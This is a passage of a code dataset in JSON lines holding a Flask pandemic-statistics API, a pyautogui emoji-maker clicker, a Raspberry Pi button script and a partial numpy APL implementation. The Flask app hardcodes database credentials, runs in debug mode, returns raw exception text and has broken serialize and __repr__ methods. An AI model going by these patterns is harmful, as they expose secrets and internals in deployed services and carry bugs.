of confirmed, probable and suspected cases\"], inplace=True)\n\nfor i in covid_data[interested_features].columns:\n if covid_data[i].isna().sum() > 0:\n covid_data[i] = covid_data[i].fillna(value=0)\n\nfor i in covid_data[interested_features].columns:\n if covid_data[i].isna().sum() > 0:\n print(i, covid_data[i].isna().sum())\n\n\n# print('Length of values after missing values handling::::::::::::::::::::::::::::::::::::::::::', len(covid_data))\napp = Flask(__name__)\nCORS(app)\n\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:root@localhost:5432/pandemic_db5'\ndb = SQLAlchemy(app)\n\nnew_vaccinations_data = vaccinations_data[['location', 'date',\n 'daily_vaccinations', 'iso_code']]\nnew_vaccinations_data = new_vaccinations_data.fillna(value=0)\n# print(new_vaccinations_data.isna().sum())\n\n\nclass COVIDENTRY(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n iso_code = db.Column(db.String(80))\n continent = db.Column(db.String(80))\n location = db.Column(db.String(80))\n date = db.Column(db.Date)\n new_cases = db.Column(db.Integer)\n new_deaths = db.Column(db.Integer)\n dateTimeStamp = db.Column(db.Integer)\n totalDeaths = db.Column(db.Integer)\n totalCases = db.Column(db.Integer)\n population = db.Column(db.Integer)\n\n def __init__(\n self, iso_code, continent, location, date, new_cases, new_deaths, dateTimeStamp, totalDeaths, totalCases, population\n ):\n self.iso_code = iso_code\n self.continent = continent\n self.location = location\n self.date = date\n self.new_cases = new_cases\n self.new_deaths = new_deaths\n self.dateTimeStamp = dateTimeStamp\n self.totalDeaths = totalDeaths\n self.totalCases = totalCases\n self.population = population\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"deaths\": self.deaths,\n \"confirm\": self.confirm,\n \"date\": str(self.date),\n \"country\": self.country\n }\n\n @staticmethod\n def serialize_list(l):\n return [m.serialize() for m in l]\n\n def __repr__(self):\n return '' % self.name\n\n\nclass SWINEENTRY(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n confirm = db.Column(db.Integer)\n deaths = db.Column(db.Integer)\n country = db.Column(db.String(80))\n date = db.Column(db.Date)\n\n def __init__(self, confirm, deaths, country, date):\n self.confirm = confirm\n self.deaths = deaths\n self.country = country\n self.date = date\n\n def __repr__(self):\n return '' % self.name\n\n\nclass EBOLAENTRY(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n confirm = db.Column(db.Integer)\n deaths = db.Column(db.Integer)\n country = db.Column(db.String(80))\n date = db.Column(db.Date)\n\n def __init__(self, confirm, deaths, country, date):\n self.confirm = confirm\n self.deaths = deaths\n self.country = country\n self.date = date\n\n def __repr__(self):\n return '' % self.name\n\n\nclass SARSENTRY(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n confirm = db.Column(db.Integer)\n deaths = db.Column(db.Integer)\n country = db.Column(db.String(80))\n date = db.Column(db.Date)\n\n def __init__(self, confirm, deaths, country, date):\n self.confirm = confirm\n self.deaths = deaths\n self.country = country\n self.date = date\n\n def __repr__(self):\n return '' % self.name\n\n\nclass VACCINEENTRY(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n daily_vaccinations = db.Column(db.Integer)\n location = db.Column(db.String(80))\n date = db.Column(db.Date)\n iso_code = db.Column(db.String(80))\n\n def __init__(self, daily_vaccinations, location, date, iso_code):\n self.daily_vaccinations = 
daily_vaccinations\n self.location = location\n self.date = date\n self.iso_code = iso_code\n\n def __repr__(self):\n return '' % self.name\n\n\nclass NumpyArrayEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, numpy.ndarray):\n return obj.tolist()\n return JSONEncoder.default(self, obj)\n\n\n@app.route('/load-adult-data-to-db')\ndef getUser():\n\n covidEntries = []\n swineEntries = []\n ebolaEntries = []\n sarsEntries = []\n vaccEntries = []\n for ind in covid_data.index:\n if datetime.strptime(covid_data['date'][ind], '%Y-%m-%d') >= datetime.strptime('2020-2-24', '%Y-%m-%d'):\n covidEntries.append(\n COVIDENTRY(\n iso_code=str(covid_data['iso_code'][ind]),\n continent=str(covid_data['continent'][ind]),\n location=str(covid_data['location'][ind]),\n new_cases=int(covid_data[\"new_cases\"][ind]),\n new_deaths=int(covid_data[\"new_deaths\"][ind]),\n date=datetime.strptime(\n covid_data['date'][ind], '%Y-%m-%d'),\n totalCases=int(covid_data[\"total_cases\"][ind]),\n totalDeaths=int(covid_data[\"total_deaths\"][ind]),\n population=int(covid_data[\"population\"][ind]),\n dateTimeStamp=datetime.timestamp(\n datetime.strptime(covid_data['date'][ind], '%Y-%m-%d'))\n )\n )\n\n # print(Cleaned_SwineFrame.isna().sum())\n for ind in Cleaned_SwineFrame.index:\n\n swineEntries.append(\n SWINEENTRY(\n country=str(Cleaned_SwineFrame['Country'][ind]),\n confirm=int(Cleaned_SwineFrame['Cases'][ind]),\n deaths=int(Cleaned_SwineFrame['Deaths'][ind]),\n date=datetime.strptime(Cleaned_SwineFrame['Update Time'][ind], '%m/%d/%Y %H:%M'))\n )\n\n for ind in ebola_data.index:\n ebolaEntries.append(\n EBOLAENTRY(\n country=str(ebola_data['Country'][ind]),\n confirm=int(\n ebola_data['Cumulative no. of confirmed, probable and suspected cases'][ind]),\n deaths=int(\n ebola_data['Cumulative no. 
of confirmed, probable and suspected deaths'][ind]),\n date=datetime.strptime(ebola_data['Date'][ind], '%Y-%m-%d'))\n )\n\n for ind in sars_data.index:\n sarsEntries.append(\n SARSENTRY(\n country=str(sars_data['Country'][ind]),\n confirm=int(\n sars_data['Cumulative number of case(s)'][ind]),\n deaths=int(\n sars_data['Number of deaths'][ind]),\n date=datetime.strptime(sars_data['Date'][ind], '%Y-%m-%d'))\n )\n\n for ind in new_vaccinations_data.index:\n vaccEntries.append(\n VACCINEENTRY(\n location=str(new_vaccinations_data['location'][ind]),\n daily_vaccinations=int(\n new_vaccinations_data['daily_vaccinations'][ind]),\n date=datetime.strptime(\n new_vaccinations_data['date'][ind], '%Y-%m-%d'),\n iso_code=str(new_vaccinations_data['iso_code'][ind])\n )\n )\n\n try:\n db.session.bulk_save_objects(covidEntries)\n db.session.bulk_save_objects(swineEntries)\n db.session.bulk_save_objects(ebolaEntries)\n db.session.bulk_save_objects(sarsEntries)\n db.session.bulk_save_objects(vaccEntries)\n db.session.commit()\n json = {\n 'name': 'Entries Added',\n }\n return jsonify(json)\n except Exception as e:\n return (str(e))\n\n# Countries for Drop Down\n\n\n@ app.route('/get-covid-countries', methods=[\"GET\"])\ndef getCovidCountries():\n try:\n covidentry = COVIDENTRY.query.with_entities(COVIDENTRY.location).filter(\n COVIDENTRY.new_cases > 0).distinct(COVIDENTRY.location)\n countries = []\n for i in covidentry:\n countries.append(i.location)\n # print(len(countries))\n return jsonify({\"countries\": countries})\n except Exception as e:\n return (str(e))\n\n# Countries for Drop Down\n\n\n@ app.route('/get-bar-chart-values', methods=[\"GET\"])\ndef getAreaChartValues():\n try:\n covidentry = COVIDENTRY.query.with_entities(COVIDENTRY.location, func.sum(COVIDENTRY.new_cases).label(\n 'totalConfirm'), func.sum(COVIDENTRY.new_deaths).label('totalDeaths')).group_by(COVIDENTRY.location).all()\n countriesStats = []\n for i in covidentry:\n countriesStats.append({\n \"Country\": i[0],\n \"ConfirmCases\": i[1],\n \"ConfirmDeaths\": i[2]\n })\n return jsonify({\"barStats\": countriesStats})\n except Exception as e:\n return (str(e))\n\n\n@ app.route('/get-bubble-chart-values', methods=[\"GET\"])\ndef getBubbleChartValues():\n try:\n covidentry = COVIDENTRY.query.with_entities(COVIDENTRY.location, COVIDENTRY.continent, func.sum(COVIDENTRY.new_cases).label(\n 'totalConfirm'), func.sum(COVIDENTRY.new_deaths).label('totalDeaths')).group_by(COVIDENTRY.location, COVIDENTRY.continent).all()\n countriesStats = []\n for i in covidentry:\n countriesStats.append({\n \"name\": i[0],\n \"value\": i[2],\n \"Continents\": i[1],\n })\n return jsonify({\"bubbleStats\": countriesStats})\n except Exception as e:\n return (str(e))\n\n\n# API for Time Series Data\n@ app.route('/get-confirm-time-chart-values', methods=[\"GET\"])\ndef getTimeSeriesConfirmedChartValues():\n try:\n covidentry = COVIDENTRY.query.filter_by(**request.args.to_dict()).with_entities(func.sum(COVIDENTRY.new_cases).label(\n 'totalConfirm')).order_by(COVIDENTRY.dateTimeStamp).group_by(COVIDENTRY.dateTimeStamp).all()\n response = []\n for i in covidentry:\n response.append(i[0])\n return jsonify({\"TImeSeriesChart\": response})\n except Exception as e:\n return (str(e))\n\n\n@ app.route('/get-deaths-time-chart-values', methods=[\"GET\"])\ndef getTimeSeriesDeathChartValues():\n try:\n\n covidentry = COVIDENTRY.query.filter_by(**request.args.to_dict()).with_entities(\n func.sum(COVIDENTRY.new_deaths\n ).label('totalDeaths')\n 
).order_by(COVIDENTRY.dateTimeStamp\n ).group_by(COVIDENTRY.dateTimeStamp).all()\n\n response = []\n for i in covidentry:\n response.append(i[0])\n return jsonify({\"TImeSeriesChart\": response})\n except Exception as e:\n return (str(e))\n\n\n@ app.route('/get-dashboard-stats-values', methods=[\"GET\"])\ndef getDashboardStatsValues():\n try:\n\n covidentry = COVIDENTRY.query.with_entities(\n COVIDENTRY.location,\n func.max(COVIDENTRY.totalCases).label('totalCasesConfirm'),\n func.max(COVIDENTRY.totalDeaths).label('totalDeathsConfirm'),\n ).order_by(COVIDENTRY.location\n ).group_by(COVIDENTRY.location).all()\n response = []\n for i in covidentry:\n response.append({\n \"Country\": i[0],\n \"ConfirmCases\": i[1],\n \"ConfirmDeaths\": i[2],\n })\n return jsonify({\"barStats\": sorted(response, key=lambda k: k['ConfirmCases'], reverse=True)})\n except Exception as e:\n return (str(e))\n\n# Get Paramters\n\n\n@app.route('/get-combineGraph-values')\ndef getParameter():\n try:\n # func method\n # from sqlalchemy import func\n # Group according to the date of a certain month of a certain year.\n start_date = datetime.strptime('2020-2-24', '%Y-%m-%d')\n end_date = datetime.strptime('2021-4-26', '%Y-%m-%d')\n if 'start_date' in request.args.to_dict():\n start_date = datetime.strptime(\n request.args.to_dict()['start_date'], '%Y-%m-%d')\n if 'end_date' in request.args.to_dict():\n end_date = datetime.strptime(\n request.args.to_dict()['end_date'], '%Y-%m-%d')\n\n covidEntries = COVIDENTRY.query.filter(\n COVIDENTRY.location == request.args.to_dict()['country'],\n COVIDENTRY.date >= start_date,\n COVIDENTRY.date <= end_date\n ).with_entities(\n func.max(COVIDENTRY.totalCases),\n func.max(COVIDENTRY.totalDeaths),\n COVIDENTRY.location,\n extract('year', COVIDENTRY.date),\n extract('month', COVIDENTRY.date)\n ).group_by(COVIDENTRY.location, extract('year', COVIDENTRY.date), extract('month', COVIDENTRY.date)\n ).order_by(extract('year', COVIDENTRY.date), extract('month', COVIDENTRY.date)).all()\n response = []\n for i in covidEntries:\n\n response.append({\n \"Cases\": i[0],\n \"Deaths\": i[1],\n \"Country\": i[2],\n \"Year\": i[3],\n \"month\": i[4],\n })\n\n return jsonify({'combineGraph': response})\n except Exception as e:\n return (str(e))\n\n\n# Countries Comparison API\n@app.route('/get-countries-compared-data', methods=[\"GET\"])\ndef get_comparison_results():\n try:\n start_date = datetime.strptime('2020-2-24', '%Y-%m-%d')\n end_date = datetime.strptime('2021-4-26', '%Y-%m-%d')\n if 'start_date' in request.args.to_dict():\n start_date = datetime.strptime(\n request.args.to_dict()['start_date'], '%Y-%m-%d')\n if 'end_date' in request.args.to_dict():\n end_date = datetime.strptime(\n request.args.to_dict()['end_date'], '%Y-%m-%d')\n\n covidEntries = COVIDENTRY.query.filter(\n COVIDENTRY.location.in_(\n [request.args.to_dict()['country1'], request.args.to_dict()['country2']]),\n COVIDENTRY.date >= start_date,\n COVIDENTRY.date <= end_date\n ).with_entities(\n func.max(COVIDENTRY.totalCases),\n func.max(COVIDENTRY.totalDeaths),\n COVIDENTRY.location,\n extract('year', COVIDENTRY.date),\n extract('month', COVIDENTRY.date)\n ).group_by(COVIDENTRY.location, extract('year', COVIDENTRY.date), extract('month', COVIDENTRY.date)\n ).order_by(extract('year', COVIDENTRY.date), extract('month', COVIDENTRY.date)).all()\n # covidentry = COVIDENTRY.query.with_entities(\n # COVIDENTRY.location,\n # COVIDENTRY.population,\n # func.max(COVIDENTRY.totalCases).label('totalCasesConfirm'),\n # 
func.max(COVIDENTRY.totalDeaths).label('totalDeathsConfirm'),\n # COVIDENTRY.continent,\n # ).order_by(COVIDENTRY.location\n # ).group_by(COVIDENTRY.location, COVIDENTRY.population, COVIDENTRY.continent).all()\n response = []\n for i in covidEntries:\n response.append({\n \"Cases\": i[0],\n \"Deaths\": i[1],\n \"Country\": i[2],\n \"Year\": i[3],\n \"month\": i[4],\n })\n\n return jsonify({\"comparison-result\": response})\n except Exception as e:\n return (str(e))\n\n\n# Overall Summary API\n@app.route('/get-overall-summary-values', methods=[\"GET\"])\ndef getSummaryValues():\n try:\n\n covidentry = COVIDENTRY.query.with_entities(\n COVIDENTRY.location,\n COVIDENTRY.population,\n func.max(COVIDENTRY.totalCases).label('totalCasesConfirm'),\n func.max(COVIDENTRY.totalDeaths).label('totalDeathsConfirm'),\n COVIDENTRY.continent,\n ).order_by(COVIDENTRY.location\n ).group_by(COVIDENTRY.location, COVIDENTRY.population, COVIDENTRY.continent).all()\n response = []\n for i in covidentry:\n response.append({\n \"Country\": i[0],\n \"Population\": i[1],\n \"ConfirmCases\": i[2],\n \"ConfirmDeaths\": i[3],\n \"Continent\": i[4],\n })\n return jsonify({\"summary\": response})\n except Exception as e:\n return (str(e))\n\n\n# API for Time Series Data\n@app.route('/get-daily-time-series-values', methods=[\"GET\"])\ndef getDailyTimeSeriesConfirmedChartValues():\n try:\n start_date = datetime.strptime('2020-2-24', '%Y-%m-%d')\n end_date = datetime.strptime('2021-4-26', '%Y-%m-%d')\n if 'start_date' in request.args.to_dict():\n start_date = datetime.strptime(\n request.args.to_dict()['start_date'], '%Y-%m-%d')\n if 'end_date' in request.args.to_dict():\n end_date = datetime.strptime(\n request.args.to_dict()['end_date'], '%Y-%m-%d')\n covidentry = COVIDENTRY.query.filter(\n COVIDENTRY.location == request.args.to_dict()['location'],\n COVIDENTRY.date >= start_date,\n COVIDENTRY.date <= end_date\n ).with_entities(func.sum(COVIDENTRY.new_cases).label(\n 'totalConfirm')).order_by(COVIDENTRY.dateTimeStamp).group_by(COVIDENTRY.dateTimeStamp).all()\n coviddeathseries = COVIDENTRY.query.filter(\n COVIDENTRY.location == request.args.to_dict()['location'],\n COVIDENTRY.date >= start_date,\n COVIDENTRY.date <= end_date\n ).with_entities(\n func.sum(COVIDENTRY.new_deaths\n ).label('totalDeaths')\n ).order_by(COVIDENTRY.dateTimeStamp\n ).group_by(COVIDENTRY.dateTimeStamp).all()\n response = []\n response1 = []\n for i in covidentry:\n response.append(i[0])\n for i in coviddeathseries:\n response1.append(i[0])\n return jsonify({\"TImeSeriesChart\": response, \"TimeSeriesDeaths\": response1})\n except Exception as e:\n return (str(e))\n\n\n# API for COMPARISON Pandemics\n@app.route('/get-swine-countries', methods=[\"GET\"])\ndef getSwineCountrieResult():\n try:\n swineentry = SWINEENTRY.query.with_entities(\n SWINEENTRY.country).distinct(SWINEENTRY.country)\n countries = []\n for i in swineentry:\n countries.append(i.country)\n # print(len(countries))\n return jsonify({\"swine_countries\": countries})\n except Exception as e:\n return (str(e))\n\n\n@app.route('/get-ebola-countries', methods=[\"GET\"])\ndef getEbolaResult():\n try:\n ebolaentry = EBOLAENTRY.query.with_entities(\n EBOLAENTRY.country).distinct(EBOLAENTRY.country)\n countries = []\n for i in ebolaentry:\n countries.append(i.country)\n # print(len(countries))\n return jsonify({\"ebolaentry_countries\": countries})\n except Exception as e:\n return (str(e))\n\n\n@app.route('/get-sars-countries', methods=[\"GET\"])\ndef getSARSResult():\n try:\n sarsentry = 
SARSENTRY.query.with_entities(\n SARSENTRY.country).distinct(SARSENTRY.country)\n countries = []\n for i in sarsentry:\n countries.append(i.country)\n # print(len(countries))\n return jsonify({\"sars_countries\": countries})\n except Exception as e:\n return (str(e))\n\n\n@app.route('/get-pandemic-100-days-results', methods=[\"GET\"])\ndef get100DayResult():\n try:\n swine_start_date = datetime.strptime(\"23-05-2009\", \"%d-%m-%Y\")\n covid_start_date = datetime.strptime('2020-2-24', '%Y-%m-%d')\n ebola_start_date = datetime.strptime('2014-8-29', '%Y-%m-%d')\n sars_start_date = datetime.strptime('2003-3-17', '%Y-%m-%d')\n covidentry = COVIDENTRY.query.filter(\n COVIDENTRY.date >= covid_start_date,\n COVIDENTRY.date <= covid_start_date + timedelta(days=100)\n ).with_entities(func.sum(COVIDENTRY.totalCases).label(\n 'totalCases')).order_by(COVIDENTRY.dateTimeStamp).group_by(COVIDENTRY.dateTimeStamp).all()\n covid_response = []\n for i in covidentry:\n covid_response.append(i[0])\n\n # SWINE Flu Querry for 100 Days\n swineentry = SWINEENTRY.query.filter(\n SWINEENTRY.date >= swine_start_date,\n SWINEENTRY.date <= swine_start_date + timedelta(days=100)\n ).with_entities(func.sum(SWINEENTRY.confirm).label(\n 'totalCases')).order_by(SWINEENTRY.date).group_by(SWINEENTRY.date).all()\n swine_response = []\n for i in swineentry:\n swine_response.append(i[0])\n\n # Ebola Querry for 100 Days\n ebulaentry = EBOLAENTRY.query.filter(\n EBOLAENTRY.date >= ebola_start_date,\n EBOLAENTRY.date <= ebola_start_date + timedelta(days=100)\n ).with_entities(func.sum(EBOLAENTRY.confirm).label(\n 'totalCases')).order_by(EBOLAENTRY.date).group_by(EBOLAENTRY.date).all()\n ebola_response = []\n for i in ebulaentry:\n ebola_response.append(i[0])\n\n # SARS Querry for 100 Days\n sarsentry = SARSENTRY.query.filter(\n SARSENTRY.date >= sars_start_date,\n SARSENTRY.date <= sars_start_date + timedelta(days=100)\n ).with_entities(func.sum(SARSENTRY.confirm).label(\n 'totalCases')).order_by(SARSENTRY.date).group_by(SARSENTRY.date).all()\n sars_response = []\n for i in sarsentry:\n sars_response.append(i[0])\n return jsonify({\"100_days_Result\": {\n \"covid_response\": covid_response,\n \"swine_response\": swine_response,\n \"ebola_response\": ebola_response,\n \"sars_response\": sars_response\n }})\n\n except Exception as e:\n return (str(e))\n\n\n@app.route('/get-pandemic-100-days-deaths-results', methods=[\"GET\"])\ndef get100DeathsDayResult():\n try:\n swine_start_date = datetime.strptime(\"23-05-2009\", \"%d-%m-%Y\")\n covid_start_date = datetime.strptime('2020-2-24', '%Y-%m-%d')\n ebola_start_date = datetime.strptime('2014-8-29', '%Y-%m-%d')\n sars_start_date = datetime.strptime('2003-3-17', '%Y-%m-%d')\n covidentry = COVIDENTRY.query.filter(\n COVIDENTRY.date >= covid_start_date,\n COVIDENTRY.date <= covid_start_date + timedelta(days=100)\n ).with_entities(func.sum(COVIDENTRY.totalDeaths).label(\n 'totalDeaths')).order_by(COVIDENTRY.dateTimeStamp).group_by(COVIDENTRY.dateTimeStamp).all()\n covid_response = []\n for i in covidentry:\n covid_response.append(i[0])\n\n # SWINE Flu Querry for 100 Days\n swineentry = SWINEENTRY.query.filter(\n SWINEENTRY.date >= swine_start_date,\n SWINEENTRY.date <= swine_start_date + timedelta(days=100)\n ).with_entities(func.sum(SWINEENTRY.deaths).label(\n 'totalDeaths')).order_by(SWINEENTRY.date).group_by(SWINEENTRY.date).all()\n swine_response = []\n for i in swineentry:\n swine_response.append(i[0])\n\n # Ebola Querry for 100 Days\n ebulaentry = EBOLAENTRY.query.filter(\n 
EBOLAENTRY.date >= ebola_start_date,\n EBOLAENTRY.date <= ebola_start_date + timedelta(days=100)\n ).with_entities(func.sum(EBOLAENTRY.deaths).label(\n 'totalDeaths')).order_by(EBOLAENTRY.date).group_by(EBOLAENTRY.date).all()\n ebola_response = []\n for i in ebulaentry:\n ebola_response.append(i[0])\n\n # SARS Querry for 100 Days\n sarsentry = SARSENTRY.query.filter(\n SARSENTRY.date >= sars_start_date,\n SARSENTRY.date <= sars_start_date + timedelta(days=100)\n ).with_entities(func.sum(SARSENTRY.deaths).label(\n 'totalDeaths')).order_by(SARSENTRY.date).group_by(SARSENTRY.date).all()\n sars_response = []\n for i in sarsentry:\n sars_response.append(i[0])\n return jsonify({\"100_days_deaths_Result\": {\n \"covid_response\": covid_response,\n \"swine_response\": swine_response,\n \"ebola_response\": ebola_response,\n \"sars_response\": sars_response\n }})\n\n except Exception as e:\n return (str(e))\n\n\n# Vacocination COuntries\n@app.route('/get-vaccination-countries', methods=[\"GET\"])\ndef getVaccinationCountries():\n try:\n vaccentry = VACCINEENTRY.query.with_entities(\n VACCINEENTRY.location).distinct(VACCINEENTRY.location)\n countries = []\n for i in vaccentry:\n countries.append(i.location)\n # print(len(countries))\n return jsonify({\"countries\": countries})\n except Exception as e:\n return (str(e))\n\n\n@app.route('/get-vacc-time-chart-values', methods=[\"GET\"])\ndef getVaccineSeriesValues():\n try:\n start_date = datetime.strptime('2021-2-22', '%Y-%m-%d')\n end_date = datetime.strptime('2021-4-26', '%Y-%m-%d')\n vaccentry = VACCINEENTRY.query.filter(\n VACCINEENTRY.location == request.args.to_dict()['location'],\n VACCINEENTRY.date >= start_date,\n VACCINEENTRY.date <= end_date\n ).with_entities(\n func.sum(VACCINEENTRY.daily_vaccinations).label('totalVaccined'),\n VACCINEENTRY.date\n ).order_by(VACCINEENTRY.date).group_by(VACCINEENTRY.date).all()\n response = []\n for i in vaccentry:\n response.append({\n 'vaccines': i[0],\n 'date': i[1]\n })\n return jsonify({\"TImeSeriesVacc\": response})\n except Exception as e:\n return (str(e))\n\n\n@app.route('/get-vacc-country-values', methods=[\"GET\"])\ndef getVaccineCountryValues():\n try:\n start_date = datetime.strptime('2021-2-22', '%Y-%m-%d')\n end_date = datetime.strptime('2021-4-26', '%Y-%m-%d')\n vaccentry = VACCINEENTRY.query.filter(\n VACCINEENTRY.date >= start_date,\n VACCINEENTRY.date <= end_date\n ).with_entities(\n func.sum(VACCINEENTRY.daily_vaccinations).label('totalVaccined'),\n VACCINEENTRY.location,\n VACCINEENTRY.iso_code\n ).order_by(VACCINEENTRY.location).group_by(VACCINEENTRY.location, VACCINEENTRY.iso_code).all()\n response = []\n for i in vaccentry:\n response.append({\n 'vaccines': i[0],\n 'location': i[1],\n 'iso_code': i[2]\n })\n return jsonify({\"countries-vaccines\": response})\n except Exception as e:\n return (str(e))\n\n\nif __name__ == \"__main__\":\n app.run(host=\"127.0.0.1\", port=8080, debug=True)\n","repo_name":"waqarayub68/IV_Backend","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":28468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"3843758356","text":"import pyautogui\nimport time\nfrom random import randint\n\ndef startGame():\n pyautogui.click(1557, 291, button = 'left')\n pyautogui.click(928, 723, button = 'left')\n time.sleep(.1)\n print('Game Started')\n chooseSkin()\n\ndef chooseSkin():\n y = 845\n number = randint(0, 8)\n x = 630 + number * 80\n print(number)\n pyautogui.click(x, y, button = 
'left')\n time.sleep(.1)\n print('Skin Chosen')\n chooseEyes()\n\ndef chooseEyes():\n pyautogui.click(695, 750, button = 'left')\n #-----------------\n eyelashNumber = randint(0,1)\n eyelashes = 909 + eyelashNumber * 80\n pyautogui.click(eyelashes, 849, button = 'left')\n time.sleep(.1)\n #-----------------\n colorNumber = randint(0, 7)\n print(colorNumber)\n x = 670 + colorNumber * 80\n pyautogui.click(x, 923, button = 'left')\n time.sleep(.1)\n print('Eyes Chosen')\n chooseMouth()\n\ndef chooseMouth():\n pyautogui.click(755, 750, button = 'left')\n #------------------\n colorNumber = randint(0, 2)\n print(colorNumber)\n x = 870 + colorNumber * 80\n pyautogui.click(x, 847, button = 'left')\n time.sleep(.1)\n print('Mouth Chosen')\n chooseEyebrows()\n\ndef chooseEyebrows():\n pyautogui.click(861, 750, button = 'left')\n #------------------\n thicknessNumber = randint(0,1)\n print(thicknessNumber)\n x = 913 + thicknessNumber*80\n pyautogui.click(x, 847, button = 'left')\n time.sleep(.1)\n #------------------\n colorNumber = randint(0, 12)\n if colorNumber > 9:\n pyautogui.click(1383, 919, button = 'left')\n colorClicked = 587 + (colorNumber - 3)*80\n pyautogui.click(colorClicked, 925, button = 'left')\n else:\n colorClicked = 587 + (colorNumber)*80\n pyautogui.click(colorClicked, 925, button = 'left')\n print('Eyebrows Chosen')\n \n \n\n\ndef main():\n pass\n \n","repo_name":"snoort/EmojiMaker","sub_path":"EmojiMaker.py","file_name":"EmojiMaker.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"23639984756","text":"import RPi.GPIO as GPIO\nimport time\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(17,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(18,GPIO.OUT)\n\npressed=0\nwhile True:\n\tif pressed:\n\t\tif not GPIO.input(17):\n\t\t\tpressed=0\n\telse:\n\t\tif GPIO.input(17):\n\t\t\tpressed=1\n\t\t\tif GPIO.input(18):\n\t\t\t\tGPIO.output(18,0)\n\t\t\telse:\n\t\t\t\tGPIO.output(18,1)\n\ttime.sleep(0.1)\n","repo_name":"zjrohrbach/rpi-leds","sub_path":"test-switch.py","file_name":"test-switch.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72786001736","text":"import itertools\nimport math\nfrom string import ascii_letters\nfrom typing import Callable, Optional\n\nimport numpy as np\n\nimport arr\nfrom environment import Env\nfrom errors import ArityError, DomainError, LengthError, NYIError, RankError\n\ndef nyi(*args):\n raise NotImplementedError('NYI')\n\ndef _is_int(a: np.ndarray) -> bool:\n return np.issubdtype(a.dtype, np.integer)\n\ndef _is_bool(a: np.ndarray) -> bool:\n return np.array_equal(a, a.astype(bool))\n\ndef _mkv(a: np.ndarray) -> np.ndarray:\n if a.ndim == 0:\n return a.reshape((1,))\n return a\n\ndef _shape2slice(a):\n return tuple([slice(0, dim) for dim in a])\n\ndef _fill_to_shape(a: np.ndarray, shape: tuple[int, ...]) -> np.ndarray:\n \"\"\"\n Reshape a to shape, but fill with prototype element if shapes are\n incompatible.\n \"\"\"\n prot = _prot(a)\n arr = np.empty(math.prod(shape), dtype=a.dtype)\n arr.fill(prot)\n arr = arr.reshape(shape)\n arr[_shape2slice(a.shape)] = a\n return arr\n\ndef _reshape_singleton(a: np.ndarray, shape: tuple[int, ...]) -> np.ndarray:\n \"\"\"\n If a is a singleton (length 1 vector), expand it to `shape`, \n repeating the data.\n\n For example, \n\n >>> _reshape_singleton(np.array([1]), (2,2))\n array([[1, 1],\n [1, 1]])\n\n Non-singleton 
arrays are left unchanged.\n \"\"\"\n if a.size != 1:\n return a\n arr = np.empty(math.prod(shape), dtype=a.dtype)\n arr.fill(a) \n return arr.reshape(shape)\n\ndef _prot_scalar(a: np.ndarray) -> np.ndarray:\n if a.ndim == 0:\n if np.issubdtype(a.dtype, np.number):\n return np.array(0)\n elif np.issubdtype(a.dtype, np.str_):\n return np.array(' ')\n return _prot(right_shoe(None, a))\n raise SyntaxError('_prot_scalar applied to non-scalar')\n \ndef _prot(a: np.ndarray) -> np.ndarray:\n \"\"\"\n Prototypal element.\n \"\"\"\n if a.ndim == 0:\n return _prot_scalar(a)\n \n first = np.array(a.ravel()[0], copy=True)\n if first.ndim == 0:\n return _prot_scalar(first)\n\n def inner(o: np.ndarray) -> None:\n \"\"\"\n Recursively set all numbers to zero and all strings to space, whilst\n keeping shape and depth nesting.\n \"\"\"\n with np.nditer(o, flags=['refs_ok'], op_flags=['readwrite']) as it: # type: ignore\n for x in it:\n if x.ndim == 0: # type: ignore\n x[...] = _prot_scalar(x) # type: ignore\n else:\n inner(right_shoe(None, x)) # type: ignore\n\n inner(first)\n return first\n\ndef mix(omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Monadic ↑ - trade depth for rank\n\n See https://aplwiki.com/wiki/Mix\n \"\"\"\n if not len(omega.shape) or not math.prod(omega.shape) or (omega.ndim == 1 and not omega.dtype == object):\n return omega\n \n shape = omega.shape\n shapes = [e.shape for e in omega]\n r = max(e.ndim for e in omega)\n\n sshapes = []\n # If ranks differ, pad shapes with 1s to the left\n for s in shapes: # (⍴↓(r⍴1)∘,)¨shapes ⍝ Prepend 1 to each shape to equal max length\n rr1 = [1]*r\n if len(s):\n rr1[-len(s):] = s\n sshapes.append(rr1)\n\n smax = np.array([max(v) for v in zip(*sshapes)]) # max per axis\n ravel = [] # type: ignore\n for i, elem in enumerate(omega):\n reshaped = _fill_to_shape(elem, tuple(sshapes[i])) # In case we added\n taken = uparrow(smax, reshaped)\n ravel.extend(taken.data)\n\n return np.array(ravel).reshape((*shape, *tuple(smax)))\n\ndef uparrow(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Monadic ↑ -- mix: https://aplwiki.com/wiki/Mix\n Dyadic ↑ -- take: https://aplwiki.com/wiki/Take\n\n Corners:\n\n [x] monadic ↑\n [x] negative take\n [x] overtake\n [x] scalar extension left\n [x] scalar extension right\n \"\"\"\n\n if alpha is None:\n return mix(omega)\n \n # Up-rank scalars to singletons\n a = _mkv(alpha)\n b = _mkv(omega)\n mag_a = abs(a)\n \n # If right is a scalar, we need to extend it to the same shape\n # as the left, filling with the prototype element of the right.\n filler = _prot(b)\n right = np.empty(math.prod(mag_a), dtype=omega.dtype)\n right.fill(filler)\n right = right.reshape(mag_a)\n\n # Generate the relevant slices for indexing,\n # respecting any negative indices.\n idx = []\n for i, axis in enumerate(a):\n if axis < 0:\n if b.size == 1:\n idx.append(slice(-1, None, 1))\n else:\n idx.append(slice(-min(abs(axis), b.shape[i]), None, 1)) \n else:\n if b.size == 1:\n idx.append(slice(0, 1, 1))\n 